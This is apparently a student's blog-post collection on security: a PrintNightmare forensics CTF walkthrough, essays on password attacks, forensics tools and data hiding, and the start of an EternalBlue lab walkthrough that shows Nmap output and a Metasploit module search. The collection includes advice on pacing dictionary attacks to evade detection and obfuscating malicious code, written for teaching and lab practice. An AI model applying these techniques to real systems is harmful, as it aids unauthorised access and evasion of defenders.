PrintNightmare, Again! CTF Walkthrough

Hackerween 2022 - Day 1

Armand Alvarez | Thursday, October 27, 2022

What is Hackerween?

Hackerween is a holiday-challenge that has 5 rooms, one released each day from the 27th of October up until Halloween! These rooms will increase in difficulty, with the first two rooms being for beginners, then getter harder and harder. You can read more at this blog post.

The first Room - PrintNightmare, Again!

The first room can be found here

The scenario describes an employee overhearing two co-workers discussing the PrintNightmare exploit and how they can use it to elevate their privileges on their local computers.

Our task is to inspect the artifacts on the endpoint and to detect the exploit they used.

We have a few more notes:

Note: Use the FullEventLogView tool. Go to Options > Advanced Options and set Show events from all times.

So, we know that this room deals with the PrintNightmare vulnerability, or CVE-2021-34527. You can read the Microsoft Security Response Center (MSRC) report on it here

To summarize the writeup, a RCE vuln exists when the Windows Print Spooler service improperly performs privileged file operations. It can allow an attacker to run code with SYSTEM privileges. The security update for Windows Server 2012, Win Server 2016, and Windows 10, version 1607 has been released.

We also see the notes: "In addition to installing the updates, in order to secure your system, you must confirm that the following registry settings are set to 0 (zero) or are not defined (Note: These registry keys do not exist by default, and therefore are already at the secure setting.), also that your Group Policy setting are correct (see FAQ):

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint
NoWarningNoElevationOnInstall = 0 (DWORD) or not defined (default setting)
UpdatePromptSettings = 0 (DWORD) or not defined (default setting)

Having NoWarningNoElevationOnInstall set to 1 makes your system vulnerable by design."

Once our machine has launched, we can click Show Split View at the top of the page to open a side window with the Windows machine.

Going through the tasks

The user downloaded a zip file. What was the zip file saved as?

We are greeted to a Desktop with two files on it: traffic.pcap (a PCAP, or packet capture, file) and Logfile.CSV, which we can presume to be some sort of log file.

Before we analyze, lets talk about the five tools we have on our Taskbar:

FullEventLogView: A tool that displays in a table the details of all events from the event logs of Windows
ProcDOT: Turns thousands of monitored activities into a big behavioral picture
Wireshark: Network protocol analyzer, this lets us view packet capture details
Brim: Network forensics and packet capture analyzer
Powershell: CLI tool to interact with the computer (kind of like the Windows version of Terminal)

Our Hint says to try using ProcDOT or FullEventLogView.

We can dump our Logfile.CSV into the Procmon portion of the ProcDOT application, and our traffic capture into the Windump portion. We can use the plugin "Files List" to view a list of files from our logfile and PCAP. If we search for any file with .zip, we see that the user BMurphy had a file in their Downloads folder called "levelup.zip". ProcDot also tells us that this file no longer exists.

The answer is levelup.zip

What is the full path to the exploit the user executed?

Now, lets look at the graph of how our user interacted with Powershell. We already loaded our Procmon and Windump monitoring logs into ProcDOT, now select the powershell process under "Render Configuration" and click Refresh. This generates a graph of all the processes and threads that Powershell created and how it interacted with different files. We see an interesting PS1 file, which is a powershell script. It is stored under a directory called CVE-2021-1675 which is related to the PrintNightmare vulnerability. If you put the full path of this Powershell script, you get the answer. This file was also deleted.

c:\users\bmurphy\Downloads\CVE-2021-1675-main\CVE-2021-1675.ps1

We could also find this PS1 file in our Files List plugin, using the same method as before.

What was the temp location the malicious DLL was saved to?

We are looking for a temp location, so we can go back to our Files List and search for any DLL by searching for the string ".dll". We see a temp location at c:\users\bmurphy\appdata\local\temp\3\nightmare.dll. This is the location.

What was the full location the DLL loads from?

We see another location that the nightmare.dll file used to be at, c:\windows\system32\spool\drivers\x64\3\new\nightmare.dll

What is the primary registry path associated with this attack?

This part requires a lot of digging on our graph. When looking under the processes to view (by selecting the Render Configuration Launcher in ProcDOT), I saw backgroundTaskHost. This is a normal windows EXE, but it seemed weird to me so I selected that and refreshed my graph. I then saw that it was touching an Autostart registry key (registry path.) This is really bizarre to me. Why would an Exe that is part of the Windows Cortana software be touching an Autostart location???

I started stepping through the event step-by-step. (You can do that with the controls ont he bottom of the application). We see that backgroundTaskHost.exe first kills its own process before setting the Autostart registry key. This kicks off spoolsv.exe which then copies the temporary exploit location to a more permanent one whcih we will call "New". Eventually it renames the file, taking out the "New" and it is just c:\Windows\System32\spool\drivers\x64\3\nightmare.dll.

Then, it creates the New file again, continues copying the temporary Nightmare.dll to it, then it queries and sets the PendingFileNameOperations registry, which can be used to automatically delete or move a file on reboot with values of a mxdwdrv.dll and nightmare.dll. We can guess the actor is probably trying to hide the nightmare.dll date in this system32/spool/driver location. They also create a new mxdwdrv.dll and rename it to the original one. Then it writes data to this mx dll. It finally sets the THMPrinter configuration file & Data file to the nightmare.dll information, and the driver to this new, fake mxdwdrv.dll file.

To summarize, it seems like it messed with Autostarts (super scary), hid this nightmare.dll in another, normal looking dll, then had the Printer data file load from this normal looking dll, which contained the malicious nightmare.dll code. Super scary stuff!

HKLM\System\CurrentControlSet\Control\Print\Environments\Windows x64\Drivers\Version-3\THMPrinter\Data File

What was the PID for the process that would have been blocked from loading a non-Microsoft-signed binary?

The process that has been loading the malicious files is spoolsv.exe, with a PID of 2600. So, ideally, it should have been blocked from loading this non-Microsoft-signed binary.

What is the username of the newly created local administrator account?

We can run the command "net user" to see the users on a machine. We can see the user backup which is a bit suspicious on a workstation.

What is the password for this user?

To do this, the hint tells us to use ProcDOT to find the Powershell history file. We can go to the powershell.exe launcher in the Render Configuration, and load the graph. From there, open the Files List and you can see the powerhshell consolehost_history.txt file location. After, you can go on powershell and invoke the command get-content <location to powershell history file> to see its contents. This gives you the username and password for the new user.

The password is ucGGDMyFHkqMRWwHtQ

What two commands did the user execute to cover their tracks? (no space after the comma)

In the same file we can see two commands that stick out for covering tracks, a rmdir command and a del command. These are the answers. Our actor removed the CVE directory and deleted the levelup.zip file.

rmdir .\CVE-2021-1675-main\,del .\levelup.zip

This was absolutely a difficult CTF, and if you didn't get it the first time, don't fret. I have done my fair share of CTF's on TryHackMe, and I struggled.... a lot. Read up on how to use ProcDOT, there are a lot of good articles out there. And if all else fails, just poke around a bit. You may find something you didn't expect.

*Notes: I could not get FullEventLogView to work. I gave it the full path for the .CSV log file and it wouldn't work. Kept giving me an error about the path being corrupted or something. If anybody has suggestions, please tweet me @_Armand_Alvarez. Happy Hacking!!

Dictionary and Brute Force Attacks

Dictionary Attacks

A dictionary attack is a methodology of password cracking that involves entering “words from a rundown as passwords to access a system, account, or encrypted document.” (Ohri, 2021) While a dictionary attack does not technically have to be used nefariously, as it can be used to gain access to your own system if you cannot get your password, it is commonly used to gain unauthorized access to a system which is, of course, unethical. In these situations there is the person attempting the attack, called the attacker, and the person whose machine or credentials the attack is being leveraged against, or the victim. These attacks can be done offline, in which the speed at which one can attack a system depends on the processing power of the attacker’s machine, or online, in which the speed depends on either the processing power of the attacker’s machine, or the limit of how often one can attempt to input a password on the victim machine. The determinant speed will be whichever is slower.

The maximum number of attempts an attacker may have to make is simply the length of the dictionary. The maximum possible time an attack may take is the length of the dictionary divided by the number of attempts that can be made over a given time period.

Brute Force Attacks

While a dictionary attack is indeed a type of brute force attack, a brute force attack is not necessarily a dictionary attack. What I mean by this is, a brute force attack is a methodology of password cracking in which an attacker tries different combinations of characters to attempt guessing a password or hash. A pure brute force attack uses “every possible combination of numbers [and] alphabets to guess the passwords.” (Tweak Library Team, 2020) A dictionary attack doesn’t use every possible combination of characters, but instead focuses the chosen passwords to a list of likely words or phrases.

To give an example of a pure brute force attack, let’s imagine there is a three character passphrase that is composed only of numerical values. Let’s imagine the passphrase is 723. A brute force attack would start with trying 000, then 001, then 002, all the way up to 723. You can find the maximum possible number of attempts it will take to perform a brute force attack by taking the total number of possible characters (in this case it is the digits 0-9, for a total of ten possible characters) and raise that number to the power of x, where x is the number of places these characters can be tried. In this case there are three places, for a total of 10³ = 1,000 possible combinations. You can find the maximum possible time by dividing this value by the number of attempts an attacker can make during a given time value, then multiplying by said time value. If, in our previous example, the attacker can make 5 attempts every minute, then the longest amount of time it can possibly take to find a password is 1000 * 1 minute/5 = 200 minutes. Given the exponential nature of how many possible combinations one may have to try when running a brute force attack, it should usually be a last resort. While the algorithm an attacker runs can be fine tuned to a specific password requirement, (in our example, we didn’t need to try any alphabet characters because the password only took numerical characters) this exponential nature can cause brute force attacks to take quite a long time to find a password. The upside is that, in theory, a brute force attack can find any password, so long as there are no limits to the number of attempts an attacker can make on the victim machine.

Dictionary Attack Procedure

Before launching a dictionary attack, an attacker will want to organize their dictionary. To begin with, an attacker should look into the infrastructure of the machine or software they will be attacking. What an attacker should be looking for are password requirements and constraints. Any password requirements and constraints can help define what should be included or not included in the dictionary. For example, if a password is required to be five-characters long, and constrained to only alphanumeric characters, the attack should make sure the dictionary includes any password of five or greater characters and those passwords that contain alphanumeric characters while also removing any password with less than five characters and passwords made up of only symbols or those made up of both symbols and alphanumerics. This is to tailor the password dictionary as finely as possible, to reduce our maximum possible time to attack.

The next step before launching the attack is to put the most likely passwords up top. If your dictionary runs from top to bottom, then by placing the most likely passwords at the top, you are more likely to have a faster total time of attack.

Once the attack begins, the program should grab a password from the attacker’s dictionary and attempt to use it on the victim’s machine. If the passwords are hashed on the victim’s machine, then the attacker should hash the dictionary value before attempting it. In an example infrastructure that hashes a password three times, the attacker will take their dictionary value, iteratively hash it three times using the same hash algorithm, then see if the password matches the one stored on the machine.

Considerations

Once you begin your attack, all an attacker can do is wait. The program should systematically go through the dictionary and attempt each password. A check may want to be programmed to only try a certain number of passwords every minute or hour to both avoid obvious detection by a security team or program, and to keep the system from locking up. Additionally, if performing an online attack, the attacker should try to sync up their attack speed with the speed in which a website or system can process an attempted login. If your algorithm doesn’t wait for a password to be successfully attempted in an online machine, your program may think it is attempting passwords when it is really only trying one password every few seconds and skips all the inbetween ones. For example, if a system can only attempt one login every minute, if your program runs one password every second and doesn’t check to make sure that login attempt has finished, then it will only try one out of every sixty passwords.

If a victim's machines use salting or hashing, then the attacker must account for this. Using multiple hashing algorithms can mean having to hash the dictionary value multiple times before seeing if it is included in a list of passwords. If passwords are salted, then an attacker must try all dictionary words for each salt value. This can increase the amount of time it takes to fully attempt each dictionary value.

References

Dictionary attack: A beginner's guide in 5 easy points. Jigsaw Academy. (2021, January 4). Retrieved April 3, 2022, from https://www.jigsawacademy.com/blogs/cyber-security/dictionary-attack/

Tweak Library Team. (2020, August 26). Difference between brute force & dictionary attack. Tweak Library. Retrieved April 3, 2022, from https://tweaklibrary.com/difference-between-brute-force-dictionary-attack/

Open-Source Digital Forensics Software

This paper will discuss four important open-source tools used in digital forensics and incident response investigations. The tools covered will be: Nmap/Zenmap, NetworkMiner, Dumpzilla, and Ophcrack.

Nmap/Zenmap

Nmap (and its GUI counterpart, Zenmap) are active network enumeration tools. They allow you to send specially crafted packets to network devices and listen for the responses. Based on these responses, the tools will determine basic network enumeration information, like OS guessing, open ports, and even open services. Nmap is the CLI version, and Zenmap is the GUI version. I personally prefer command line, because I believe it is faster, but many people are more comfortable on a GUI than in CLI. When testing Nmap on Google’s DNS server, it comes back with the open ports and some service fingerprinting to let us know more about the machines we are enumerating. I was able to see that the DNS server has port 53 and 443 up, however other ports may have been blocked by the firewall from replying to my nmap scan. This tool can be used in investigations to help enumerate a network, but keep in mind that it can often be noisy and bring unwanted attention to yourself.

I used the option: -sCV to specify that I want default scripts to run and I want to do service enumeration. There are a lot of options you can use, some of which are more aggressive and will get you more information, others that are slow and stealthy to avoid detection.

Zenmap is the GUI counterpart to nmap, performing the same functionality only in a graphical interface. The interface is simple to use, and uses common parlance for the types of scans you want to do, while also showing you the command that nmap will run in the backend. This isn’t a bad way to learn different kinds of scans and how they interact. The output will look something like this:

NetworkMiner

Sometimes, active enumeration is not an option. Actively touching a network can negatively affect network performance and sometimes even bring down machines. This is where NetworkMiner comes in. NetworkMiner is a passive network sniffer used to detect OS, hostname, and other features of network machines. After running it on my machine and surfing the web for a short while, these were my results:

Where WireShark focuses on network traffic, making that the forefront of what a user sees, NetworkMiner seems to focus more on enumeration. When I look my results, they are contained in the IP that interacted with/on my network. I expanded the IP of my device and saw that it guessed Windows, which is correct. It probably does this based on the TTL of the packets. Although I would not use this tool for real-world network diagnosis, it may be another tool in your arsenal for enumerating a network and putting together a more detailed network map.

Dumpzilla

Dumpzilla is a tool used to scrape traffic information from Firefox browser (along with other, lesser used browsers.) This is an incredibly useful, and dangerous, tool if it can get on a victim machine. I ran the tool and got results from an older profile of Firefox I used to use in 2021:

It is kind of scary seeing that a tool can extract exactly what I put into a search bar on my browser, but thinking from a red team perspective, it can serve extremely useful during a penetration test to try and find possible sites to use for a watering hole attack. In terms of Incident Response, this tool allows an investigator to quickly gather browsing data from a host machine. A script can be written to download the tool onto the machine, run the script on all Firefox profiles on the machine, transfer the results back to the investigator, and then remove the tool from the machine.

Ophcrack

Ophcrack is a free Windows password cracker that uses rainbow tables to accomplish its goals. Rainbow tables are basically precomputed tables storing hashed strings. This can be checked against password hashes to find a result. One downside of rainbow tables is that quite a large amount of storage is usually needed for them. When you download the program, you also need to download the tables you want. To emphasize my point before about storage size, one table I saw was around 3 Gb, which isn’t exactly small for a password cracker. After running the tool with the XP free fast rainbow table, it couldn’t crack the “test” password I provided it:

This is quite disappointing, but I believe with more rainbow tables and proper password hashes, this tool could be useful for getting into a computer.

Data Hiding Techniques

Data hiding is a method of doing exactly what the name suggests, hiding sensitive data. This can be used to watermark images, hide exploitative code, and transfer secret messages. This paper will cover 4 techniques used for data hiding, as well as the tools employed in these techniques.

First, we will cover Steganography. Steganography is “The practice of hiding a secret message inside of… something that is not secret. (Stanger, 2020) One of the core focuses of steganography is to “focus on the imperceptivity of both the hidden data and the act of data embedding.” (Shi et al., 2016) In other words, not only is it important to successfully conceal data in another cover medium, but the integrity of that medium must not be noticeably deteriorated. If you choose to hide data within an image, a human must not be able to notice that the image quality has decreased. This technique is commonly used with images to embed an invisible watermark in them. If somebody were to steal the image, this could be proven by looking at where this watermark data is hidden.

There is an online steganography tool (https://stylesuxx.github.io/steganography/) that can be used to freely hide messages within images.

As you can see above, it is as easy as selecting an image and typing a message. The two images (before and after steganography) are below, and there is no noticeable difference. We can send this photograph to somebody else, who can then use the decoding function to view our original message.

Another method of data hiding is code obfuscation. When you write malicious code, you probably do not want it to be reverse engineered, especially by the blue team. By obfuscating your code, you make it incredibly difficult to understand, by adding an overwhelming amount of redundancy. For example, instead of writing a function that prints out “Hello World”, you can write a function that calls out to some random internet page with the word “Hello” in the HTML code. Rip that word out from the HTML and store it into a variable, then display that variable followed by the word “World.” Once run, both functions would accomplish the same task, but one of them is more difficult to understand, especially by a human reader. There is a free online JavaScript obfuscation tool that can employe this very method (https://obfuscator.io/). Below, we can see the stark difference between a simple Hello World script, and that same code once it has been obfuscated.

The third method of data hiding is bit shifting. This is when you shift the bits of data to make readable material look like gibberish. You can perform this on almost any medium, as to get your original data back you only need to shift the bits back to their original position. This can be used with code to make it appear as a binary file or some other oddly-formatted file. Because the computer analyzes the hex values of the file, you likely will not be able to run a bit-shifted piece of code until you reverse the bit-shift process. The online tool Dcode (https://www.dcode.fr/circular-bit-shift) will allow us to bit-shift a message and make it literally unreadable.

The last technique covered will be hiding data in bad blocks. When a computer looks for places to store information, it knows not to looked at marked bad blocks. These are “blocks [that] have (supposedly) gone bad.” (Verhasselt, 2009) These locations will not be looked at by the file system. If we tell the filesystem which blocks are bad (even if they aren’t), we can hide data there and the filesystem will never check it. This is more useful on older machines, as this technique is a bit out-dated, but most valuable infrastructure is on dated machines. Creating and using bad blocks is a straightforward, but fairly technical process. If you want to see an in-depth example on this technique, see the following blog post: https://davidverhasselt.com/hide-data-in-bad-blocks/

References

dCode. (2022). Circular bit shift. Online Decoder, Encoder, Solver, Translator. Retrieved February 14, 2022, from https://www.dcode.fr/circular-bit-shift

Kachalov, T. (n.d.). JavaScript obfuscator tool. JavaScript Obfuscator Tool. Retrieved February 13, 2022, from https://obfuscator.io/

Shi, Y.-Q., Li, X., Zhang, X., Wu, H.-T., & Ma, B. (2016). Reversible data hiding: Advances in the past two decades. IEEE Access, 4, 3210–3237. https://doi.org/10.1109/access.2016.2573308

Stanger, J. (2020, July 6). The ancient practice of steganography: What is it, how is it used and why do cybersecurity pros need to understand it. Default. Retrieved February 13, 2022, from https://www.comptia.org/blog/what-is-steganography

stylesuxx@gmail.com. (n.d.). Steganography Online. Steganography online. Retrieved February 14, 2022, from https://stylesuxx.github.io/steganography/

Verhasselt, D. (2009, April 22). Hide data in bad blocks. Retrieved February 14, 2022, from https://davidverhasselt.com/hide-data-in-bad-blocks/

Analyzing a USB Image with Autopsy

The Sleuth Kit is “a collection of command line tools and a C library that allows you to analyze disk images and recover files from them.” (sleuthkit.org) Autopsy is the GUI frontend that runs on TSK (The Sleuth Kit) backend. In a nutshell, Autopsy allows you to do digital forensics investigations on device images.

When you start the program, you can create a new case. Cases are the individual investigation that you, or your organization, are currently a part of. An investigation will usually have a name, contact information of the investigators working on it, and a central location for the investigation files to sit. Once you create a new case, you can select the Host to be auto-generated, choose the “Disk Image or VM File” Data Source Type, provide the path to your USB image, then load your image into Autopsy, where it will begin analyzing it.

Now that the image file is loaded into Autopsy, you may start exploring it. You can look into each part of the USB image, including FAT files, and see the results in either text or hex. This is brilliant for being able to find data hidden in the parts of the USB drive that a normal file explorer would not allow you to see. An example of this is orphan files. These orphan files are files that are deleted and no longer in the parent folder. Autopsy will automatically analyze the image when you provide it and locate any orphan files. A practical example of when this may be useful would be if the person you are investigating deletes files but doesn’t go any further than that to hide their traces. Autopsy will locate most or all of the deleted remnants of these files and still allow you to view them.

A common method of anti-forensics is steganography. This is where you hide data within data, such as hiding text information within an image file. Because Autopsy has a Hex examiner, you can look through the hex or plain-text of a file to find information that may be hidden within it. Autopsy can also be configured to use Google or Bing to translate text, meaning that Autopsy can be used when investigating nation-state events.

Autopsy’s Application tab will display a file in what appears to be it’s native state. For example, if you find a JPEG file on the USB drive, you can view the image as is, instead of just analyzing hex. It will also display videos and HTML files. You can also view the file’s metadata easily, which is very useful for finding timestamps.

When I loaded up a peer’s USB drive image onto Autopsy, I went exploring into the file structure. I found images, which I could view as the image and as hex. The headers of the text results allowed me to verify it was a JPEG file. Additionally, I found an MP3 file that I could actually play on my machine! Listening to a jazz song while analyzing a device image isn’t a bad combination.

One last thing I will touch on, when you explore the file system, you can view change times and access times for each file. During an investigation, this may be important for attribution reasons. If you know that a crime occurred during a particular time window, you can better attribute that crime to a suspect. By being provided access and change times, you can attribute an event to the user of the device during that time.

References

Open Source Digital Forensics. The Sleuth Kit (TSK) & Autopsy: Open Source Digital Forensics Tools. (n.d.). Retrieved February 5, 2022, from https://www.sleuthkit.org/

Device Imaging with dd

In this tutorial, I will explain what dd is and how to use it to create an image of a device. Let’s start with explaining what an image is, and why you may want to create one. An image is just a “comprehensive duplicate of electronic media such as a hard-disk drive.” (Goldstein, 2019) Comprehensive duplicate means that it exactly copies a device, being a USB-drive, hard-drive, floppy disk, etc, bit-for-bit. Images are used in virtualization when you want to run an Operating System from a predetermined state, and in digital forensics investigations to ensure that all work is done on an image, so as to not accidentally taint the integrity of an original piece of evidence.

The dd command in Linux (*nix) is “a command-line utility for Unix and Unix-like operating systems whose primary purpose is to convert and copy files.” (GeeksforGeeks, 2019) In other words, dd is a program that can be run in a Linux or Unix terminal that can easily make an image of a device medium, such as a USB drive. dd is built into *nix machines so you don’t have to worry about installing it.

Let’s begin by looking at the manual file and learning the syntax. You can read the man file of most binaries by invoking man <binary>. For dd, you can read it with man dd.

We can see that dd is used to convert and copy files, and you can manually adjust some of the operands. The general syntax is dd [OPERAND]. The only operands we will worry about for this tutorial are if (infile), of (outfile), and status. The infile is the device you want to make an image of, the outfile is where you want this image to be safed, and status is used to provide a given level of information to the user.

When you want to create an image of a usb drive, we must first locate the usb drive using lsblk. This command “lists information about all available devices.” (Broz, Zak 2021)

We can see a couple devices, but we will focus on sdb. This is the second disk drive, and will likely be the usb-stick you want to image. To double check that this is the drive you want to image, you can look at the MOUNTPOINT for sdb1 and see that it is mounted at /media/ubuntu/003B-5B4A. Just list the files in that location using ls and make sure it is the usb-stick you want to image.

Next, we will invoke the dd command. The syntax we will use will be as follows:

sudo dd if=/dev/sdb of=~/Desktop/imageOfUSB status=progress

Above, we specify that we want the infile, or device we want to image, to be the USB stick drive. The outfile will save the image in our current user’s desktop, called imageOfUSB, and the status line states that we want to see the progress of the image. The sudo at the beginning means that we will run the command as superuser, which is necessary for the dd program. When the program completes the copy, the output should look like this:

We can use hashes to ensure that both the image and device are exactly the same, bit-for-bit. A hash takes any input and outputs a string of alphanumeric characters. These characters are found with a very complex algorithm. It ensures that if any data changes, even if one bit is flipped, the output of the hash algorithm will look vastly different. We can see below that the image and the device have the same hash results:

Now, we will put the image on an empty usb stick. To ensure it is empty, I will explain how to format (clean) a usb-stick. First, open the Disks utility on Linux. The screen should look something like this:

Next, select the usb stick. Click the cogwheels on the volume you want to format, then click Format Partition. You can name the volume, but make sure you select Erase to erase everything on that usb stick. Click Next then click Format. It shouldn’t take too long for small drives, but if you have anything over 1GB, it will likely take a few minutes. Anything over 10GB may take an hour or longer on a virtual machine. Anything over 1TB may take a day. Once it is formatted, we can run essentially the reverse of our previous command to put the image onto the usb drive.

sudo dd if=~/Desktop/imageOfUSB of=/dev/sdb status=progress

This may take a lot longer than the previous run, since usb write speeds are usually slower than the read speeds.

That is really all there is to making images and putting images onto devices.

References

Broz, M., & Zak, K. (2021, October 27). lsblk(8) -- Linux manual page. LSBLK(8) - linux manual page. Retrieved January 29, 2022, from https://man7.org/linux/man-pages/man8/lsblk.8.html

GeeksforGeeks. (2019, May 15). 'DD' command in linux. GeeksforGeeks. Retrieved January 29, 2022, from https://www.geeksforgeeks.org/dd-command-linux/#:~:text=dd%20is%20a%20command%2Dline,system%20just%20like%20normal%20files.

Goldstein, S. (2019, September 24). Two key differences between digital forensic imaging and digital forensic clone and how they can affect your legal case.: News: Capsicum: Digital Forensics, investigations, cyber security. CAPSICUM. Retrieved January 29, 2022, from https://capsicumgroup.com/2-key-differences-between-digital-forensic-imaging-and-digital-forensic-clone-and-how-they-can-affect-your-legal-case/#:~:text=A%20Forensic%20Image%20is%20a,as%20a%20hard%2Ddisk%20drive.&text=This%20exact%20duplicate%20of%20the,for%20analysis%20and%20evidence%20preservation.

Introduction to Linux Commands

While Windows may “dominate the game on home computers,” (Galov, 2021) the Linux operating system has over 95% of the market share for the world’s top 1 million web servers (Vaughan-Nichols, 2015). Linux is a popular operating system most often used in servers, and as the OS for Android phones. Like any OS, Linux has a command line interface, or CLI, that is usually used by system administrators. A CLI works by inputting commands and arguments. For Linux, the syntax of this input is command [arg1] [arg2].... This paper will go over some of the most important commands to know when using Linux. I will stay away from some of the more powerful commands, and will stick to beginner-friendly commands to get you more comfortable with Linux CLI.

Let’s begin by grouping and summarizing the commands I will explain in this paper. First, we have the get-out-of-jail-free commands. These include help, and man. These commands will assist users in figuring out how specific commands work, or just present a shortened list of commands that can be used at the present moment in the OS. Next is the traversal commands: pwd, cd. These commands are used to traverse your file directory. Finally, I will touch on file manipulation commands, including mkdir, rmdir, touch, vim/nano, and cat.

Let’s start with help. While help isn’t always available on every distribution of Linux, if you find yourself in a place with no idea what command to use, it is a good idea to try typing either help or ?. These commands on their own will sometimes give you a list of some basic commands you can use within that workspace. This is good if you are pentesting and you gain access to a device and have no idea what commands can be used. Additionally, sometimes using help [command] will give you a shortened description of how to use the command. The man command is arguably one of the most important commands, because it will reference the manual page for a given program or command. Whether you completely forget how to use a command, or want to figure out how to use a specific feature of that command, typing man [command] is always a good bet. Be sure to understand that man doesn’t have entries for every single command possible. If you install something from GitHub, it may not have a manual entry.

Once you know what commands you can use and how to use them, you may want to explore the system directory. This is where the following commands come in handy. First is pwd. This command stands for print working directory. It essentially just prints the full filename of your current working directory, or where you are in the filesystem. One thing to note is that everything is a file in Linux. Directories (the equivalent of folders in Windows OS) are files, just like how a text file is a file. That’s why the pwd command will print the full filename of where you are. If you ever find yourself lost in the filesystem, use this command to regain your bearings. After you know where you are, you can navigate to another file with cd. This stands for change directory. It allows you to navigate to another file, or directory, within the system. You can navigate with an explicit file, or implicitly. To navigate to an explicit file, you must type the file filename and location for that file, from the highest level all the way down to the actual file. This may look like /home/kali/Desktop/Important Documents. It is called explicit because you are explicitly referencing the directory you want to travel to, with no regard for your current location. Implicit file traversal uses your current location to find where you want to go. You can reference parent directories with <../> and the current directory with <./>. If you want to travel to a directory called “Dir” that is two parent directories above your current location, you can do so with cd ../../Dir.

Now, I expect that you have found the directory you wished to visit. How can you create a new directory to store files in? Of course, with the mkdir command, which stands for make directories. This command does exactly that, it makes a directory either in your current location, or with the given explicit/implicit location. It only creates the directory if one by that name and in that location does not already exist. You can also set the mode for the created directory, which affects who can read, write, and execute files within the directory. Further, you can remove directories with rmdir, however they must be empty. There are certain flags within the rm command that allows you to recursively delete a non-empty directory, but I will not be writing about that in this paper.

You can create empty files with the touch command. The official use of this command is to change file timestamps, but the average Linux user will use this to create empty files. To edit a file on a Linux command line, you will likely use either Vim, or Nano. These are two text editors that will come preinstalled on most versions of Linux. To run either, simply type Vim/nano [filename]. This will launch the editor and allow you to edit the provided file. If the file does not exist, these programs will open an empty file that will be saved as the provided filename upon a save command being used. Nano is considered a lot more beginner friendly, as Vim is known for having a pretty steep learning floor, however the skill ceiling for Vim is a lot higher, and becoming proficient in it’s keybindings will allow you to edit files incredibly fast.

The last command I will write about is cat. The official use is to concatenate files, and print to the command line, but like the touch command it is typically used to display the contents of various types of files. The syntax is cat [filename]. Running this command will display all the contents of the file. Be cautious when using this on non-text files or compressed/encrypted files. It may display characters that can confuse your shell, and then you may need to launch a new shell to get it to work properly again.

References

Galov, N. (2021, August 9). 111+ mind-boggling linux statistics and facts for 2021 - linux rocks! HostingTribunal. Retrieved January 22, 2022, from https://hostingtribunal.com/blog/linux-statistics/#gref

Vaughan-Nichols, S. (2015, October 15). Can the internet exist without linux? ZDNet. Retrieved January 22, 2022, from https://www.zdnet.com/article/can-the-internet-exist-without-linux/

Blue

Armand Alvarez | Friday, 05 November 2021

Since I use tmux, and I use multiple sessions, I set the tmux env variable $IP to the IP address givent to me by THM.

 └─$ tmux setenv IP 10.10.91.32

Nmap

# Nmap 7.91 scan initiated Fri Nov  5 22:39:26 2021 as: nmap -sCV -v -oN initial 10.10.91.32
Increasing send delay for 10.10.91.32 from 0 to 5 due to 255 out of 848 dropped probes since last increase.
Nmap scan report for 10.10.91.32
Host is up (0.11s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
| rdp-ntlm-info: 
|   Target_Name: JON-PC
|   NetBIOS_Domain_Name: JON-PC
|   NetBIOS_Computer_Name: JON-PC
|   DNS_Domain_Name: Jon-PC
|   DNS_Computer_Name: Jon-PC
|   Product_Version: 6.1.7601
|_  System_Time: 2021-11-06T02:40:39+00:00
| ssl-cert: Subject: commonName=Jon-PC
| Issuer: commonName=Jon-PC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-11-05T02:12:25
| Not valid after:  2022-05-07T02:12:25
| MD5:   860d 0816 ffbb 1bde 790e f320 9a87 3abb
|_SHA-1: b33b 9c4e b514 c812 32b1 324c 397d 10e6 6c9b 3ad8
|_ssl-date: 2021-11-06T02:40:44+00:00; +1s from scanner time.
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49158/tcp open  msrpc         Microsoft Windows RPC
49159/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h00m00s, deviation: 2h14m09s, median: 0s
| nbstat: NetBIOS name: JON-PC, NetBIOS user: , NetBIOS MAC: 02:fd:9f:77:75:ad (unknown)
| Names:
|   JON-PC<00>           Flags: 
|   WORKGROUP<00>        Flags: 
|   JON-PC<20>           Flags: 
|   WORKGROUP<1e>        Flags: 
|   WORKGROUP<1d>        Flags: 
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: 
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-11-05T21:40:38-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-11-06T02:40:38
|_  start_date: 2021-11-06T02:12:24

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov  5 22:40:43 2021 -- 1 IP address (1 host up) scanned in 77.09 seconds

We can see from this that the machine has SMB running - with the OS: Windows 7 Service Pack 1. The SMBv1 server in this OS is vulnerable to Eternal Blue, or CVE-2017-0144 CVE link. This vulnerability was published in MS security bulletin ms17-010 MS Bulletin

Metasploit

msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
